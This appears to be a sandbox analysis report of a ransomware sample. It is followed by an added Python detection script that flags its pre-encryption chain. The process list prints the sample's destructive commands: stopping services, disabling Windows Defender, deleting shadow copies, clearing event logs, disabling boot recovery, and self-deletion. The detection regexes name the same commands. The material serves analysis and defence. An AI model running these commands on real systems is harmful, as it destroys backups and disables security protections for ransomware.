Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 844 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 1452 wrote to memory of 760 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1452 wrote to memory of 760 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1452 wrote to memory of 760 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 428 wrote to memory of 1060 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 428 wrote to memory of 1060 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 428 wrote to memory of 1060 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 592 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 592 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 592 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 592 wrote to memory of 1596 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 592 wrote to memory of 1596 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 592 wrote to memory of 1596 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 1836 wrote to memory of 432 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1836 wrote to memory of 432 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1836 wrote to memory of 432 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1804 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 1804 wrote to memory of 1876 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1876 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1876 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1040 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1040 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1040 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 1040 wrote to memory of 1504 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 1504 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 1504 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1568 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1568 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1568 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 1568 wrote to memory of 952 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1568 wrote to memory of 952 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1568 wrote to memory of 952 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1776 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1776 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 844 wrote to memory of 1776 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\net.exe
PID 1776 wrote to memory of 1624 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1776 wrote to memory of 1624 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1776 wrote to memory of 1624 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 844 wrote to memory of 968 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 968 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 968 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1288 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1288 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1288 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe
PID 844 wrote to memory of 2028 | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
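
Read top to bottom, the process list above is the complete pre-encryption chain this sample runs before it touches a single user file: stop and disable backup and security services (net.exe / sc.exe), neutralise Defender by policy keys, driver and service start type, scheduled tasks, definition removal and Set-MpPreference, destroy shadow copies (vssadmin and wmic), clear the System, Security and Application logs, disable boot recovery, open the ransom note, and finally self-delete behind a ping delay. The following Python is an added example and is not part of this report or of the sandbox's output: it runs one rule per stage over constructed process-creation events whose command lines are copied from the list above, groups the hits by parent PID and flags any parent that drove several distinct stages. The event layout (pid, ppid, cmdline), the child PIDs, and the attribution of every child to parent PID 844 are assumptions of the example; the report itself records 844 only as the parent of the sc.exe children.

```python
"""Flag the pre-encryption command chain from this report in process-creation events."""
import re
from collections import defaultdict

# One rule per stage of the chain; each regex runs against the lower-cased command line.
RULES = [
    ("service_stop", re.compile(
        r'\bnet1?(?:\.exe)?\s+stop\s+"?(?:vss|wbengine|sdrsvc|samss|netmsmqactivator'
        r'|sstpsvc|ui0detect|webclient)"?\s+/y')),
    ("service_disable", re.compile(
        r'\bsc(?:\.exe)?\s+config\s+"?[\w.-]+"?\s+start=\s*disabled')),
    ("defender_policy", re.compile(
        r'\breg(?:\.exe)?\s+(?:add|delete)\s+"hklm\\software\\policies\\microsoft\\windows defender')),
    ("defender_service_off", re.compile(
        r'\breg(?:\.exe)?\s+add\s+"hklm\\system\\currentcontrolset\\services\\'
        r'(?:windefend|wdfilter|wdboot|wdnisdrv|wdnissvc|securityhealthservice)"'
        r'\s+/v\s+"?start"?\s+/t\s+reg_dword\s+/d\s+"?4"?')),
    ("defender_task_off", re.compile(
        r'\bschtasks(?:\.exe)?\s+/change\s+/tn\s+"microsoft\\windows\\'
        r'(?:windows defender|exploitguard)\\[^"]+"\s+/disable')),
    ("defender_defs_removed", re.compile(r'mpcmdrun(?:\.exe)?"?\s+-removedefinitions')),
    ("defender_mppreference", re.compile(r'set-mppreference\s+-disable\w+\s+\$true')),
    ("shadow_delete", re.compile(
        r'(?:\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete)')),
    ("eventlog_clear", re.compile(
        r'\bwevtutil(?:\.exe)?\s+cl\s+(?:system|security|application)\b')),
    ("boot_recovery_off", re.compile(
        r'\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+'
        r'(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)')),
    ("ransom_note_opened", re.compile(r'\bnotepad(?:\.exe)?\s+\S*how_to_decrypt\.txt')),
    ("self_delete", re.compile(r'\bping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\s')),
]

# Constructed events modelled on the process list in this report. Command lines are copied
# from the report; the pid/ppid layout, the child PIDs and the attribution of every child
# to PID 844 are assumptions of this example (the report shows 844 spawning sc.exe).
SAMPLE_EVENTS = [
    {"pid": 1001, "ppid": 844, "cmdline": r'net.exe stop "VSS" /y'},
    {"pid": 1002, "ppid": 844, "cmdline": r'sc.exe config "VSS" start= disabled'},
    {"pid": 1003, "ppid": 844, "cmdline": r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'},
    {"pid": 1004, "ppid": 844, "cmdline": r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'},
    {"pid": 1005, "ppid": 844, "cmdline": r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'},
    {"pid": 1006, "ppid": 844, "cmdline": r'vssadmin.exe delete shadows /all /quiet'},
    {"pid": 1007, "ppid": 844, "cmdline": r'wevtutil.exe cl security'},
    {"pid": 1008, "ppid": 844, "cmdline": r'bcdedit.exe /set {default} recoveryenabled no'},
    {"pid": 1009, "ppid": 844, "cmdline": r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 1010, "ppid": 844, "cmdline": r'cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true'},
    {"pid": 1011, "ppid": 844, "cmdline": r'notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt'},
    {"pid": 1012, "ppid": 844, "cmdline": r'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"'},
    # Routine administration from another parent (constructed): must not be flagged.
    {"pid": 4120, "ppid": 3000, "cmdline": "sc.exe query WinDefend"},
    {"pid": 4121, "ppid": 3000, "cmdline": "wevtutil.exe qe Security /c:5"},
    {"pid": 4122, "ppid": 3000, "cmdline": r'reg.exe query "HKLM\Software\Policies\Microsoft\Windows Defender"'},
]


def classify(cmdline):
    """Return the set of stage names matched by one command line."""
    line = cmdline.lower()
    return {name for name, rx in RULES if rx.search(line)}


def triage(events, min_stages=4):
    """Group stage hits by parent PID and return {ppid: sorted stages} for every parent
    that drove at least min_stages distinct stages. One hit is admin noise; several
    distinct stages from one parent is the ransomware precursor pattern."""
    stages_by_parent = defaultdict(set)
    for ev in events:
        stages_by_parent[ev["ppid"]] |= classify(ev["cmdline"])
    return {ppid: sorted(stages) for ppid, stages in stages_by_parent.items()
            if len(stages) >= min_stages}


if __name__ == "__main__":
    for ppid, stages in triage(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {len(stages)} stages -> {', '.join(stages)}")
```

Each rule on its own fires on legitimate administration (an operator can run vssadmin delete shadows or wevtutil cl during maintenance), so the scoring counts distinct stages per parent rather than matching lines; with the report's chain every one of the twelve stages is attributable to the sample process, while the constructed admin commands from another parent produce no hit at all.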

Network

N/A

Files

memory/1452-54-0x0000000000000000-mapping.dmp

memory/760-55-0x0000000000000000-mapping.dmp

memory/428-56-0x0000000000000000-mapping.dmp

memory/1060-57-0x0000000000000000-mapping.dmp

memory/592-58-0x0000000000000000-mapping.dmp

memory/1596-59-0x0000000000000000-mapping.dmp

memory/1836-60-0x0000000000000000-mapping.dmp

memory/432-61-0x0000000000000000-mapping.dmp

memory/1804-62-0x0000000000000000-mapping.dmp

memory/1876-63-0x0000000000000000-mapping.dmp

memory/1040-64-0x0000000000000000-mapping.dmp

memory/1504-65-0x0000000000000000-mapping.dmp

memory/1568-66-0x0000000000000000-mapping.dmp

memory/952-67-0x0000000000000000-mapping.dmp

memory/1776-68-0x0000000000000000-mapping.dmp

memory/1624-69-0x0000000000000000-mapping.dmp

memory/968-70-0x0000000000000000-mapping.dmp

memory/1288-71-0x0000000000000000-mapping.dmp

memory/1752-72-0x0000000000000000-mapping.dmp

memory/1732-73-0x0000000000000000-mapping.dmp

memory/1276-74-0x0000000000000000-mapping.dmp

memory/2028-75-0x0000000000000000-mapping.dmp

memory/1564-76-0x0000000000000000-mapping.dmp

memory/1924-77-0x0000000000000000-mapping.dmp

memory/1708-78-0x0000000000000000-mapping.dmp

memory/268-79-0x0000000000000000-mapping.dmp

memory/1036-80-0x0000000000000000-mapping.dmp

memory/564-81-0x0000000000000000-mapping.dmp

memory/1596-82-0x0000000000000000-mapping.dmp

memory/808-83-0x0000000000000000-mapping.dmp

memory/1168-84-0x0000000000000000-mapping.dmp

memory/660-85-0x0000000000000000-mapping.dmp

memory/1152-86-0x0000000000000000-mapping.dmp

memory/1524-87-0x0000000000000000-mapping.dmp

memory/1392-88-0x0000000000000000-mapping.dmp

memory/1620-89-0x0000000000000000-mapping.dmp

memory/560-90-0x0000000000000000-mapping.dmp

memory/1244-91-0x0000000000000000-mapping.dmp

memory/912-92-0x0000000000000000-mapping.dmp

memory/1044-93-0x0000000000000000-mapping.dmp

memory/888-94-0x0000000000000000-mapping.dmp

memory/884-95-0x0000000000000000-mapping.dmp

memory/1616-96-0x0000000000000000-mapping.dmp

memory/1824-97-0x0000000000000000-mapping.dmp

memory/1852-98-0x0000000000000000-mapping.dmp

memory/1320-99-0x0000000000000000-mapping.dmp

memory/612-100-0x0000000000000000-mapping.dmp

memory/2000-101-0x0000000000000000-mapping.dmp

memory/1696-102-0x0000000000000000-mapping.dmp

memory/924-103-0x0000000000000000-mapping.dmp

memory/1744-104-0x0000000000000000-mapping.dmp

memory/1612-105-0x0000000000000000-mapping.dmp

memory/760-106-0x0000000000000000-mapping.dmp

memory/744-107-0x0000000000000000-mapping.dmp

memory/1816-108-0x0000000000000000-mapping.dmp

memory/1504-109-0x0000000000000000-mapping.dmp

memory/1872-110-0x0000000000000000-mapping.dmp

memory/540-111-0x0000000000000000-mapping.dmp

memory/1760-112-0x0000000000000000-mapping.dmp

memory/1760-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp

memory/1060-114-0x0000000000000000-mapping.dmp

memory/1928-116-0x0000000000000000-mapping.dmp

memory/1748-118-0x0000000000000000-mapping.dmp

memory/812-119-0x0000000000000000-mapping.dmp

memory/1920-120-0x0000000000000000-mapping.dmp

memory/1868-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp

memory/1868-124-0x0000000002412000-0x0000000002414000-memory.dmp

memory/1868-126-0x000000000241B000-0x000000000243A000-memory.dmp

memory/1868-125-0x0000000002414000-0x0000000002417000-memory.dmp

memory/1868-123-0x0000000002410000-0x0000000002412000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b8e610b2334f1c528aa7ec5b8c07f1e4
SHA1 3583b173c98b14b9fc18c798cecd94fd9889fb31
SHA256 187b9e01b982fce924b1c7182002c48cd192205e7b2c2d86ea9c11264bee1792
SHA512 743f07cd92debbcbee136af8b2e6e2921e89d6ccd10884a89417448cb378777b086632c6ddab05d02920f7ca9845c86163af0eded72afc8a66bcf1fa887e8494

memory/2136-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp

memory/2136-130-0x000000001B7C0000-0x000000001BABF000-memory.dmp

memory/2136-133-0x0000000002804000-0x0000000002807000-memory.dmp

